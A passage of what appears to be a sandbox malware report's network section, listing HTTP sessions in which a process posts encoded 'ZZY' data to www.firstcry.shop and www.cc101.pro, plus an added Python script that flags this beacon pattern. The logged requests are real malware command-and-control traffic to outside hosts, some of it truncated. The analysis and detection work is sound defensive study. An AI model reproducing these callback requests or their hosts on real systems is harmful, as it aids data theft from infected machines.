                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 70 74 61 65 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /ptae/ was not found on this server.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49946 | 13.248.169.48 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:06:06.326176882 CEST | 677 | OUT | POST /e4x0/ HTTP/1.1
                                                                                                                Host: www.firstcry.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.firstcry.shop
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.firstcry.shop/e4x0/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 47 50 37 57 6f 45 4c 34 4c 49 44 58 4e 56 78 37 38 53 49 73 4e 37 4c 37 57 33 75 6c 54 58 48 2b 35 64 35 2f 73 7a 6e 65 62 5a 6a 47 49 4d 46 6e 49 35 6b 61 45 39 38 74 62 53 5a 4d 6f 6a 4c 33 6a 67 53 66 70 66 45 49 64 36 32 43 33 69 33 37 57 52 58 51 45 79 59 49 6a 57 4a 38 6e 49 76 78 69 51 46 4d 6a 54 71 43 2b 65 4a 67 53 47 4c 53 69 32 5a 77 4f 51 49 77 36 65 53 6f 37 34 64 61 37 66 70 65 50 73 71 43 47 66 34 58 30 4d 6f 47 51 6d 38 6e 57 32 75 58 56 75 6a 45 45 49 2f 50 75 48 33 77 69 78 64 6d 79 37 6c 56 68 67 76 48 6c 38 68 55 32 33 5a 32 50 34 70 36 41 6a 6d 74 45 67 38 53 72 41 39 4c 38 73 63 70 76 79 47 4c 32 51 3d 3d
                                                                                                                Data Ascii: ZZY=GP7WoEL4LIDXNVx78SIsN7L7W3ulTXH+5d5/sznebZjGIMFnI5kaE98tbSZMojL3jgSfpfEId62C3i37WRXQEyYIjWJ8nIvxiQFMjTqC+eJgSGLSi2ZwOQIw6eSo74da7fpePsqCGf4X0MoGQm8nW2uXVujEEI/PuH3wixdmy7lVhgvHl8hU23Z2P4p6AjmtEg8SrA9L8scpvyGL2Q==


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49961 | 13.248.169.48 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:06:08.870631933 CEST | 697 | OUT | POST /e4x0/ HTTP/1.1
                                                                                                                Host: www.firstcry.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.firstcry.shop
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.firstcry.shop/e4x0/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 47 50 37 57 6f 45 4c 34 4c 49 44 58 4d 31 42 37 2b 7a 49 73 4b 62 4c 34 61 58 75 6c 4b 6e 48 36 35 64 39 2f 73 79 54 4f 62 76 7a 47 49 75 64 6e 4c 37 4d 61 44 39 38 74 55 79 5a 4e 73 6a 4c 38 6a 67 4f 68 70 64 51 49 64 36 79 43 33 67 76 37 58 6d 44 66 46 69 59 4b 70 47 4a 2b 36 59 76 78 69 51 46 4d 6a 51 57 38 2b 61 74 67 52 33 37 53 74 33 5a 7a 45 77 49 78 39 65 53 6f 2f 34 64 65 37 66 6f 4c 50 74 32 6b 47 5a 30 58 30 4f 41 47 51 58 38 67 46 57 75 64 52 75 69 4b 48 4c 66 48 73 30 44 64 6d 6a 64 36 79 62 4e 76 70 32 79 6c 2f 65 74 34 6f 6d 68 4e 4c 36 4e 4d 58 46 37 59 47 68 34 4b 6d 69 4a 71 6a 62 35 44 69 67 6e 50 67 6d 38 69 33 44 45 46 70 74 55 44 63 63 59 56 65 65 33 32 31 5a 38 3d
                                                                                                                Data Ascii: ZZY=GP7WoEL4LIDXM1B7+zIsKbL4aXulKnH65d9/syTObvzGIudnL7MaD98tUyZNsjL8jgOhpdQId6yC3gv7XmDfFiYKpGJ+6YvxiQFMjQW8+atgR37St3ZzEwIx9eSo/4de7foLPt2kGZ0X0OAGQX8gFWudRuiKHLfHs0Ddmjd6ybNvp2yl/et4omhNL6NMXF7YGh4KmiJqjb5DignPgm8i3DEFptUDccYVee321Z8=


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 49971 | 13.248.169.48 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:06:11.670664072 CEST | 1710 | OUT | POST /e4x0/ HTTP/1.1
                                                                                                                Host: www.firstcry.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.firstcry.shop
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.firstcry.shop/e4x0/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 47 50 37 57 6f 45 4c 34 4c 49 44 58 4d 31 42 37 2b 7a 49 73 4b 62 4c 34 61 58 75 6c 4b 6e 48 36 35 64 39 2f 73 79 54 4f 62 76 37 47 4c 64 56 6e 49 64 45 61 43 39 38 74 64 53 5a 32 73 6a 4c 6c 6a 67 47 74 70 64 73 48 64 34 36 43 78 46 37 37 51 58 44 66 50 69 59 4b 68 6d 4a 2f 6e 49 75 72 69 51 55 46 6a 51 47 38 2b 61 74 67 52 31 7a 53 70 6d 5a 7a 43 77 49 77 36 65 53 30 37 34 64 36 37 66 52 77 50 74 7a 66 48 70 55 58 31 75 51 47 44 30 55 67 66 57 75 54 63 4f 6a 58 48 4c 53 5a 73 30 66 5a 6d 69 70 41 79 59 74 76 36 42 54 36 37 65 31 68 30 56 78 6f 41 34 42 4d 51 58 76 4f 4c 7a 6f 4b 2b 7a 70 47 6d 5a 42 41 6e 78 66 67 70 57 6f 2f 6a 54 45 6d 6d 74 5a 57 66 72 78 6b 62 66 66 4a 6f 39 35 71 31 75 30 31 6b 74 51 52 49 36 76 42 6b 36 57 6c 49 78 36 41 57 41 75 38 2f 44 42 61 31 33 6a 6a 73 59 72 62 66 38 58 48 46 67 64 50 49 51 56 76 44 4b 48 50 6f 6a 6b 6f 73 4d 43 4d 39 61 56 68 49 6d 6a 79 6b 2f 6f 71 2f 71 71 73 6d 4b 74 2b 70 50 75 6f 44 35 49 78 79 48 52 57 61 4d 66 45 4f 34 66 58 41 45 [TRUNCATED]
Data Ascii: ZZY= [TRUNCATED]


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 49976 | 13.248.169.48 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:06:14.321759939 CEST | 416 | OUT | GET /e4x0/?ZZY=LNT2rxv1IZbcC3Jj0QJlS4XPU2WjJkC92LI5ghjdfeHuVtRNJYUfNJ81Qyljm2TCpzqhutEcPP6D5gqXcB7APUAChnFD6LC10hZW5DnCrv8nATu9qGN6LFx4zvr8w5xDip8OL+K5FPsX&mHm0o=rrqhoH HTTP/1.1
                                                                                                                Host: www.firstcry.shop
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Connection: close
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
Oct 9, 2024 14:06:14.708092928 CEST | 412 | IN | HTTP/1.1 200 OK
                                                                                                                Server: openresty
                                                                                                                Date: Wed, 09 Oct 2024 12:06:14 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Content-Length: 272
                                                                                                                Connection: close
                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 5a 5a 59 3d 4c 4e 54 32 72 78 76 31 49 5a 62 63 43 33 4a 6a 30 51 4a 6c 53 34 58 50 55 32 57 6a 4a 6b 43 39 32 4c 49 35 67 68 6a 64 66 65 48 75 56 74 52 4e 4a 59 55 66 4e 4a 38 31 51 79 6c 6a 6d 32 54 43 70 7a 71 68 75 74 45 63 50 50 36 44 35 67 71 58 63 42 37 41 50 55 41 43 68 6e 46 44 36 4c 43 31 30 68 5a 57 35 44 6e 43 72 76 38 6e 41 54 75 39 71 47 4e 36 4c 46 78 34 7a 76 72 38 77 35 78 44 69 70 38 4f 4c 2b 4b 35 46 50 73 58 26 6d 48 6d 30 6f 3d 72 72 71 68 6f 48 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?ZZY=LNT2rxv1IZbcC3Jj0QJlS4XPU2WjJkC92LI5ghjdfeHuVtRNJYUfNJ81Qyljm2TCpzqhutEcPP6D5gqXcB7APUAChnFD6LC10hZW5DnCrv8nATu9qGN6LFx4zvr8w5xDip8OL+K5FPsX&mHm0o=rrqhoH"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.7 | 49977 | 188.114.96.3 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:06:19.814477921 CEST | 665 | OUT | POST /0r21/ HTTP/1.1
                                                                                                                Host: www.cc101.pro
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.cc101.pro
                                                                                                                Content-Length: 216
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.cc101.pro/0r21/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 53 72 34 32 58 52 5a 74 6c 7a 42 54 33 62 75 6c 6e 77 68 4f 44 35 34 37 37 36 77 37 61 73 6b 78 46 61 50 71 6e 47 46 5a 78 49 44 2b 78 43 76 59 65 2f 53 59 47 63 47 4d 53 42 6e 47 6e 51 79 58 33 62 6d 74 62 65 5a 71 67 4f 42 4a 2b 74 4b 47 53 7a 51 70 64 43 50 54 61 64 52 6e 6d 2b 79 75 32 36 33 33 4a 70 2f 2b 56 70 79 4b 30 5a 53 55 47 43 47 50 70 38 39 51 75 32 2f 55 4f 6e 59 64 69 79 6f 65 4b 47 4c 6e 38 41 77 76 74 6b 48 70 54 6f 30 4d 78 33 43 37 4a 4a 48 37 34 53 36 50 62 5a 5a 48 6d 74 42 48 44 66 38 4f 7a 6f 70 63 39 7a 4c 45 4c 6e 59 50 62 41 6a 6c 4a 62 71 6f 6d 6a 61 72 31 47 4a 63 66 39 37 69 37 4b 4b 4e 5a 77 3d 3d
                                                                                                                Data Ascii: ZZY=Sr42XRZtlzBT3bulnwhOD54776w7askxFaPqnGFZxID+xCvYe/SYGcGMSBnGnQyX3bmtbeZqgOBJ+tKGSzQpdCPTadRnm+yu2633Jp/+VpyK0ZSUGCGPp89Qu2/UOnYdiyoeKGLn8AwvtkHpTo0Mx3C7JJH74S6PbZZHmtBHDf8Ozopc9zLELnYPbAjlJbqomjar1GJcf97i7KKNZw==
Oct 9, 2024 14:06:20.954010963 CEST | 690 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                Date: Wed, 09 Oct 2024 12:06:20 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IOrQ3tnCd59Icrs7zxXIa4Y5izZSw9882pz%2Btxb5JRg1WShwM3wtXkm%2Frml7lLdsU2eB8I18t0hcL0a2BrdoPtuBaItNwATdFJabmGH5EMSV3knYJagrOrZrDrmpnr7a"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8cfe3e78886572b6-EWR
                                                                                                                Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0
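
Across sessions 0 to 6 the same process sends GET and POST requests to different hosts with one fixed Android Chrome 39 User-Agent, a four-character directory (/ptae/, /e4x0/, /0r21/), Connection: close, and a single form field named ZZY, carried in the query string for GET and in the body for POST; the servers answer 404, a JavaScript redirect, or 405, which is what you would expect when most of the contacted hosts are not the live controller. The code below is an added example and not part of the Joe Sandbox report: a small HTTP/1.1 request parser plus a clustering rule that flags a User-Agent reaching several hosts with exactly that shared request shape. The request texts are copied from sessions 0, 1, 4 and 5, trimmed to the request line, the headers the rule reads and the first characters of each ZZY value; the last request is a constructed benign control. The directory regex, the three-host threshold and the function names are choices made here, not something the report states.

```python
"""Request-shape clustering over the HTTP sessions captured above.

Added example, not part of the Joe Sandbox report. Requests are grouped by User-Agent and a
group is flagged when it reaches several hosts using only short directories, Connection:
close and one and the same leading form-field name. Regex, threshold and names are this
script's own.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

UA = ("Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) "
      "AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36")

# Copied from sessions 0, 1, 4 and 5 of the report, cut to the request line, the headers
# read below and the first characters of each ZZY value. The final request is constructed
# here as a benign control and does not come from the report.
REQUESTS = [
    "GET /ptae/?ZZY=w3WU5oZhC+LnKx26kaNk+YWYu6qqBKD6PC4MUwZYu&mHm0o=rrqhoH HTTP/1.1\n"
    f"Host: www.bluegirls.blog\nConnection: close\nUser-Agent: {UA}\n",
    "POST /e4x0/ HTTP/1.1\nHost: www.firstcry.shop\n"
    "Content-Type: application/x-www-form-urlencoded\nConnection: close\n"
    f"User-Agent: {UA}\n\nZZY=GP7WoEL4LIDXNVx78SIsN7L7W3ulTXH+5d5/sznebZjGIMFn",
    "GET /e4x0/?ZZY=LNT2rxv1IZbcC3Jj0QJlS4XPU2WjJkC92LI5ghjdfeHu&mHm0o=rrqhoH HTTP/1.1\n"
    f"Host: www.firstcry.shop\nConnection: close\nUser-Agent: {UA}\n",
    "POST /0r21/ HTTP/1.1\nHost: www.cc101.pro\n"
    "Content-Type: application/x-www-form-urlencoded\nConnection: close\n"
    f"User-Agent: {UA}\n\nZZY=Sr42XRZtlzBT3bulnwhOD54776w7askxFaPqnGFZxID+xCvYe",
    "GET /index.html?q=security HTTP/1.1\nHost: www.example.com\nConnection: keep-alive\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36\n",
]

PARAM_NAME = re.compile(r"(?:^|&)([^&=]+)=")   # field names in a form-urlencoded string
SHORT_DIR = re.compile(r"^/[a-z0-9]{4}/$")     # /ptae/, /e4x0/, /0r21/ in the sessions above


def parse_request(raw):
    """Split one raw HTTP/1.1 request into the fields the rule needs."""
    head, _, body = raw.partition("\n\n")
    request_line, *header_lines = head.splitlines()
    method, target, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    # The form data travels in the query string for GET and in the body for POST.
    params = body if method == "POST" else url.query
    return {
        "method": method,
        "host": headers.get("host", ""),
        "path": url.path,
        "param_names": tuple(PARAM_NAME.findall(params)),
        "user_agent": headers.get("user-agent", ""),
        "connection": headers.get("connection", "").lower(),
    }


def beacon_clusters(requests, min_hosts=3):
    """Flag a User-Agent that contacts at least min_hosts hosts where every request uses a
    four-character directory, Connection: close and the same leading form-field name."""
    by_agent = defaultdict(list)
    for req in requests:
        by_agent[req["user_agent"]].append(req)
    flagged = []
    for agent, reqs in by_agent.items():
        hosts = {r["host"] for r in reqs}
        fields = {r["param_names"][0] for r in reqs if r["param_names"]}
        shape_ok = all(SHORT_DIR.match(r["path"]) and r["connection"] == "close" for r in reqs)
        if len(hosts) >= min_hosts and len(fields) == 1 and shape_ok:
            flagged.append({"user_agent": agent, "field": fields.pop(),
                            "hosts": sorted(hosts), "paths": sorted({r["path"] for r in reqs})})
    return flagged


if __name__ == "__main__":
    for hit in beacon_clusters([parse_request(r) for r in REQUESTS]):
        print(f"field {hit['field']!r} sent to {len(hit['hosts'])} hosts via {hit['paths']}")
```

Keying on the User-Agent alone would be weak, since the string is a real browser's; the rule only fires when the same agent also shows the short-directory path, the explicit Connection: close and a single recurring field name across several hosts, which is the combination visible in every outbound request of this report. In a proxy log you would run the same rule per client IP over a window of minutes rather than over a hand-picked list.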


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.7 | 49978 | 188.114.96.3 | 80 | 1104 | C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
Timestamp | Bytes transferred | Direction | Data
Oct 9, 2024 14:06:22.359015942 CEST | 685 | OUT | POST /0r21/ HTTP/1.1
                                                                                                                Host: www.cc101.pro
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.cc101.pro
                                                                                                                Content-Length: 236
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.cc101.pro/0r21/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 53 72 34 32 58 52 5a 74 6c 7a 42 54 31 2f 71 6c 30 44 35 4f 55 70 34 36 33 61 77 37 51 4d 6b 74 46 61 4c 71 6e 47 74 7a 77 36 33 2b 30 54 66 59 5a 37 47 59 4b 38 47 4d 59 68 6d 4d 6a 51 79 63 33 62 72 4e 62 66 6c 71 67 4b 70 4a 2b 74 36 47 53 45 45 6d 50 69 50 64 56 39 52 6c 69 2b 79 75 32 36 33 33 4a 70 71 52 56 70 36 4b 30 70 43 55 4a 44 47 4d 6b 63 39 54 6e 57 2f 55 4b 6e 59 5a 69 79 6f 33 4b 43 43 38 38 43 49 76 74 67 4c 70 51 38 41 50 34 33 43 31 4e 4a 47 57 70 69 33 65 43 61 70 49 6e 4c 52 54 61 66 63 2f 32 65 30 2b 6e 52 48 6f 56 32 67 30 66 43 48 54 65 39 33 64 6b 69 65 7a 34 6b 39 39 41 4b 65 49 32 59 72 4a 50 4c 32 37 44 62 32 75 66 62 51 45 54 7a 4c 45 37 48 6c 62 34 4a 45 3d
                                                                                                                Data Ascii: ZZY=Sr42XRZtlzBT1/ql0D5OUp463aw7QMktFaLqnGtzw63+0TfYZ7GYK8GMYhmMjQyc3brNbflqgKpJ+t6GSEEmPiPdV9Rli+yu2633JpqRVp6K0pCUJDGMkc9TnW/UKnYZiyo3KCC88CIvtgLpQ8AP43C1NJGWpi3eCapInLRTafc/2e0+nRHoV2g0fCHTe93dkiez4k99AKeI2YrJPL27Db2ufbQETzLE7Hlb4JE=
                                                                                                                Timestamp: Oct 9, 2024 14:06:23.353688002 CEST | Bytes transferred: 692 | Direction: IN | Data: HTTP/1.1 405 Not Allowed
                                                                                                                Date: Wed, 09 Oct 2024 12:06:23 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Oqtoy0cmReJldr0%2FglwLVRTex0YAM7Nh4CU%2Bz5EiGWCKU4Q0pjn7MdaHNDgdPbSWT0pt0ZW4sQCdlIkUG1nVaqzMSJXtssh1qGUYYx1y6EO7%2BX19muTZdse9iyT7GH2N"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8cfe3e884b1f42eb-EWR
                                                                                                                Data Raw: 39 35 0d 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a 0a 0a 0a 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                Data Ascii: 95<html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>0


                                                                                                                Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49979 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 1104 | Process: C:\Program Files (x86)\jiQHbjscaMcKbPOlOroupNlgeKQaKZsecmPTcdBGPKRlFNgULSZwTYQAEfmJOzLaHJAOeFYgauUXuA\uxEGEjhWYrJv.exe
                                                                                                                Timestamp: Oct 9, 2024 14:06:24.917965889 CEST | Bytes transferred: 1698 | Direction: OUT | Data: POST /0r21/ HTTP/1.1
                                                                                                                Host: www.cc101.pro
                                                                                                                Accept: */*
                                                                                                                Accept-Language: en-US,en
                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                Origin: http://www.cc101.pro
                                                                                                                Content-Length: 1248
                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                Connection: close
                                                                                                                Cache-Control: no-cache
                                                                                                                Referer: http://www.cc101.pro/0r21/
                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; SPH-L710 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36
                                                                                                                Data Raw: 5a 5a 59 3d 53 72 34 32 58 52 5a 74 6c 7a 42 54 31 2f 71 6c 30 44 35 4f 55 70 34 36 33 61 77 37 51 4d 6b 74 46 61 4c 71 6e 47 74 7a 77 36 76 2b 6f 78 58 59 5a 5a 75 59 4c 38 47 4d 55 42 6d 50 6a 51 79 64 33 62 7a 42 62 66 70 36 67 4d 74 4a 2f 4d 61 47 55 78 6f 6d 46 69 50 64 65 64 52 6b 6d 2b 7a 36 32 35 4f 77 4a 70 36 52 56 70 36 4b 30 72 4b 55 41 79 47 4d 33 73 39 51 75 32 2f 69 4f 6e 59 68 69 78 59 47 4b 43 47 73 38 79 6f 76 73 41 62 70 63 76 6f 50 67 6e 43 33 4b 4a 47 4f 70 69 36 47 43 62 45 35 6e 4c 4e 35 61 63 4d 2f 33 4a 4a 6a 31 77 2f 2b 55 6d 34 66 65 68 66 31 51 4d 32 68 36 44 53 32 37 55 38 63 45 4b 6d 33 39 37 6e 7a 50 66 6e 6b 55 59 75 68 52 72 63 72 54 6d 44 42 73 32 39 34 72 2b 6d 41 58 59 69 7a 67 38 48 67 77 52 30 6c 41 30 7a 43 4c 58 62 33 67 47 71 38 37 36 5a 37 30 32 72 48 58 6a 43 47 42 62 78 48 56 46 71 67 48 79 53 35 6c 78 39 69 4b 46 2f 57 4e 34 46 45 49 66 67 6a 48 71 51 74 56 48 7a 2f 5a 6c 77 30 6b 2b 59 35 68 4f 62 70 79 31 5a 75 77 31 77 64 6c 53 70 30 4d 53 34 65 2b 47 [TRUNCATED]
                                                                                                                Data Ascii: ZZY=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 [TRUNCATED]
                                                                                                                Timestamp: Oct 9, 2024 14:06:25.838443995 CEST | Bytes transferred: 692 | Direction: IN | Data: HTTP/1.1 405 Not Allowed
                                                                                                                Date: Wed, 09 Oct 2024 12:06:25 GMT
                                                                                                                Content-Type: text/html
                                                                                                                Transfer-Encoding: chunked
                                                                                                                Connection: close
                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1sqpAzcvsN2ZnOqDrVNb9lByjwQUKjXt86ho0uZN7zBovmOm95uzHGUZ%2F05lmZpRmnwi3rYwOue8f6R19rpFnZ8yxojHtNUTJZsP1c5BECbwXUYYXon1Dx%2B17Oha%2BNoe"}],"group":"cf-nel","max_age":604800}
                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                Server: cloudflare
                                                                                                                CF-RAY: 8cfe3e983b0d42da-EWR
